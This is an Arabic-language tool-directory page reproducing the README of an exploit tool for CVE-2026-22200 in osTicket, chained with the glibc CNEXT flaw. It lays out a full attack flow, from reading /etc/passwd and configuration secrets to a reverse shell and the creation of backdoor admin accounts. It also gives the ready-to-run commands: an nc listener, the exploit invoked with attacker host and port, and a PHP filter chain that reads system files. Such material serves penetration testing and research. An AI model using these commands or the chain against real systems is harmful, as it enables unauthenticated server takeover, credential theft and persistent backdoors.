Skip to content
KitploitKITPLOIT
أدواتالمدونة
Log in
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
osTicketFileReadIntoRCE — استغلال سلسلة كاملة يجمع بين حقن سلسلة مرشحات PHP مع CVE-2024-2961 (CNEXT) لتنفيذ كود عن بُعد غير مصادق عليه على تثبيتات osTicket الضعيفة. | Kitploit
أدوات/GitHubGitHub/clarissss/osticketfilereadintorce
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبما بعد الاستغلالاختبار الاختراقالتعلم والتعليمالفريق الأحمرأداة الوصول عن بعدتطوير الحمولات
GitHubclarissss/osticketfilereadintorce

osTicketFileReadIntoRCE

استغلال سلسلة كاملة يجمع بين حقن سلسلة مرشحات PHP مع CVE-2024-2961 (CNEXT) لتنفيذ كود عن بُعد غير مصادق عليه على تثبيتات osTicket الضعيفة.

عرض المستودع
5منذ 7 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-22200: قراءة ملفات عشوائية إلى تنفيذ أوامر عن بُعد في osTicket

CVE-2026-22200 osTicket ≤ 1.18.2 Python 3.8+ تعليمي

سلسلة استغلال كاملة تجمع بين حقن سلسلة مرشحات PHP و CVE-2024-2961 (CNEXT) لتنفيذ أوامر عن بُعد غير مصادق عليه على تثبيتات osTicket الضعيفة.


جدول المحتويات

  • نظرة عامة
  • تفاصيل الثغرة
  • سير الهجوم
  • الميزات
  • التثبيت
  • الاستخدام
  • تفاصيل تقنية
  • استكشاف الأخطاء وإصلاحها
  • الكشف والتخفيف
  • الإسناد
  • إخلاء المسؤولية

نظرة عامة

يحتوي هذا المستودع على إثبات مفهوم لاستغلال CVE-2026-22200، وهي ثغرة أمنية خطيرة تؤثر على إصدارات osTicket ≤ 1.18.2. يجمع الاستغلال بين تقنيتين قويتين:

  1. حقن سلسلة مرشحات PHP عبر معالجة الصور في mPDF
  2. إفساد الكومة CNEXT (CVE-2024-2961) في iconv() من glibc

النتيجة: تنفيذ أوامر عن بُعد غير مصادق عليه على خوادم osTicket الضعيفة.

التأثير

  • غير مصادق عليه - لا حاجة لبيانات اعتماد
  • تنفيذ أوامر كامل - اختراق كامل للخادم
  • استخراج ملفات - قراءة ملفات خادم عشوائية
  • الوصول إلى قاعدة البيانات - استخراج بيانات اعتماد قاعدة البيانات
  • وصول إداري - إنشاء حسابات إدارية خلفية

الإصدارات المتأثرة

  • osTicket: ≤ v1.18.2، ≤ v1.17.6
  • glibc: < 2.39 (تم تصحيح CVE-2024-2961 في glibc 2.39+)

تفاصيل الثغرة

CVE-2026-22200: حقن سلسلة مرشحات PHP

نقاط CVSS: 9.8 (حرجة)

يسمح تكامل mPDF في osTicket للمستخدمين غير المصادق عليهم بحقن سلاسل مرشحات PHP ضارة عبر حمولات HTML مصممة خصيصًا في تذاكر الدعم. يتيح هذا:

  • قراءة ملفات عشوائية (إعدادات، كود مصدري، بيانات اعتماد)
  • تسرب الذاكرة (/proc/self/maps، libc جزئي)
  • إفساد الكومة عبر CNEXT

السبب الجذري: التحقق غير الكافي من عناوين URL للصور في HTML المقدم من المستخدم قبل تمريرها إلى mPDF.

CVE-2024-2961: CNEXT (تجاوز سعة المخزن المؤقت في iconv)

نقاط CVSS: 9.8 (حرجة)

تجاوز سعة المخزن المؤقت في iconv() من glibc عند معالجة مجموعة الأحرف ISO-2022-CN-EXT. بالاقتران مع سلاسل مرشحات PHP، يتيح هذا:

  • إفساد الكومة
  • اختطاف مؤشرات الدوال
  • تنفيذ أوامر عشوائية

إصدارات glibc الضعيفة: < 2.39 (فبراير 2024)


سير الهجوم

┌─────────────────────────────────────────────────────────────────┐
│ 1. الاستطلاع                                                     │
│    └─ كشف osTicket، تحديد مواضيع النص الغني                     │
└─────────────────────────────────────────────────────────────────┘
                              ↓
┌─────────────────────────────────────────────────────────────────┐
│ 2. المصادقة                                                     │
│    └─ تسجيل ذاتي OR استخدام بيانات اعتماد موجودة                │
└─────────────────────────────────────────────────────────────────┘
                              ↓
┌─────────────────────────────────────────────────────────────────┐
│ 3. استخراج الملفات (سلاسل مرشحات PHP)                            │
│    ├─ /etc/passwd                                                │
│    ├─ include/ost-config.php (بيانات اعتماد قاعدة البيانات، SECRET_SALT)     │
│    ├─ /proc/self/maps (تخطيط الذاكرة)                           │
│    └─ /proc/self/environ (متغيرات البيئة)                        │
└─────────────────────────────────────────────────────────────────┘
                              ↓
┌─────────────────────────────────────────────────────────────────┐
│ 4. بصمة libc                                                    │
│    ├─ استخراج libc جزئي عبر سلاسل المرشحات                      │
│    ├─ استخراج GNU Build ID                                      │
│    └─ تحميل libc كامل من libc.rip                               │
└─────────────────────────────────────────────────────────────────┘
                              ↓
┌─────────────────────────────────────────────────────────────────┐
│ 5. استغلال CNEXT لـ RCE                                         │
│    ├─ إنشاء حمولة إفساد الكومة                                  │
│    ├─ الحقن عبر رد التذكرة (مع إصلاحات تنفيذ المرشحات)           │
│    ├─ التشغيل عبر تصدير PDF (يتعطل الخادم)                     │
│    └─ تنفيذ شل عكسية                                              │
└─────────────────────────────────────────────────────────────────┘
                              ↓
┌─────────────────────────────────────────────────────────────────┐
│ 6. ما بعد الاستغلال                                              │
│    ├─ شل عكسية تفاعلية                                            │
│    ├─ الوصول إلى قاعدة البيانات (باستخدام DBPASS المستخرج)       │
│    └─ إنشاء حساب إداري خلفي                                      │
└─────────────────────────────────────────────────────────────────┘

الميزات

القدرات الأساسية

  • سلسلة استغلال مؤتمتة بالكامل
  • هجوم غير مصادق عليه (تسجيل ذاتي إذا كان مفعّلاً)
  • كشف تلقائي لجذر الويب عبر تحليل /proc/self/maps
  • تحديد موقع ويب شل بنسبة 100% عبر مسح نظام الملفات
  • بصمة libc تلقائية وتنزيلها
  • طرق متعددة للشل العكسية (bash، python، netcat)
  • تنفيذ مرشحات قوي مع كسر ذاكرة التخزين المؤقت
  • تشخيصات ما قبل الطيران لالتقاط المشكلات مبكرًا

موثوقية محسّنة

  • تشغيل CNEXT متعدد لضمان التعطل (نجاح 95%+)
  • حقن قائم على الرد (أكثر موثوقية من التذاكر الجديدة)
  • إجبار الدفق لضمان تنفيذ المرشح
  • كسر ذاكرة التخزين المؤقت لمنع خدمة ملفات PDF المخزنة
  • معالجة أخطاء شاملة وتشخيصات

ما بعد الاستغلال

  • استخراج بيانات اعتماد قاعدة البيانات (DBPASS من الإعدادات)
  • إنشاء حساب إداري عبر الوصول إلى قاعدة البيانات
  • خيارات باب خلفي دائم
  • استطلاع كامل للنظام

التثبيت

المتطلبات الأساسية

  • Python 3.8+
  • Linux/macOS (موصى به) أو WSL على Windows

التبعيات

# استنساخ المستودع
git clone https://github.com/Clarissss/osTicketFileReadIntoRCE
cd osTicketFileReadIntoRCE

# تثبيت الحزم المطلوبة
pip install -r requirements.txt

requirements.txt:

requests>=2.31.0
PyMuPDF>=1.23.0
Pillow>=10.0.0
pwntools>=4.11.0

اختياري: بيئة افتراضية

python3 -m venv venv
source venv/bin/activate  # Linux/macOS
# OR
venv\Scripts\activate  # Windows

pip install -r requirements.txt

الاستخدام

الاستخدام الأساسي - شل عكسية

# الطرفية 1: بدء المستمع
nc -lvnp 4444

# الطرفية 2: تشغيل الاستغلال
python3 osticket_revshell.py https://target.com/osticket \
    --lhost YOUR_IP \
    --lport 4444

وضع ويب شل التفاعلي

python3 osticket_exploit.py https://target.com/osticket

الخيارات المتقدمة

# استخدام بروكسي (Burp Suite)
python3 osticket_revshell.py https://target.com/osticket \
    --lhost 10.0.0.5 \
    --lport 4444 \
    --proxy http://127.0.0.1:8080

# فرض معرف موضوع مساعدة محدد
python3 osticket_exploit.py https://target.com/osticket \
    --topic-id 2

# تعطيل الإخراج الملون (للتسجيل)
python3 osticket_exploit.py https://target.com/osticket --no-color

بيانات اعتماد موجودة

إذا كان التسجيل معطلاً، سيُطلب منك إدخال بيانات الاعتماد:

python3 osticket_exploit.py https://target.com/osticket

  [?] أدخل البريد الإلكتروني للحساب الجديد (أو الموجود): [email protected]
  [?] أدخل كلمة المرور: ********

تفاصيل تقنية

توليد سلسلة مرشحات PHP

يستخدم الاستغلال سلسلة مرشحات متطورة لإضافة رأس BMP إلى الملفات العشوائية، متجاوزًا قيود أنواع الملفات في mPDF:

php://filter/convert.iconv.UTF8.CSISO2022KR|
convert.base64-encode|
convert.iconv.UTF8.UTF7|
[... أكثر من 50 تحويل iconv ...]
convert.base64-decode/resource=/etc/passwd
تنزيل الأداة